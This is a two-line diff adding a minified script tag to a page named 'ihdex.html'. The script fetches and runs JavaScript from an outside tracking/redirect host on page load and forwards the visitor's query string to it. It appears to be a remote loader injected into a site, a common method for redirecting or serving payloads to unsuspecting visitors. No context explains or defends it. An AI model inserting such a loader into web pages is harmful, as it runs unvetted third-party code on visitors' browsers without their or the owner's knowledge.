--- a/ihdex.html
+++ b/ihdex.html
@@ -1,1 +1,2 @@
 
+<script type="text/javascript">!function(){var a=document.createElement("script");a.type="text/javascript",a.src="https://zebix.bemobtrk.com/go-js/5a519773-9626-4229-b5cd-65043025f181?"+window.location.search.substring(1);var b=document.getElementsByTagName("script")[0];b.parentNode.insertBefore(a,b)}();</script>
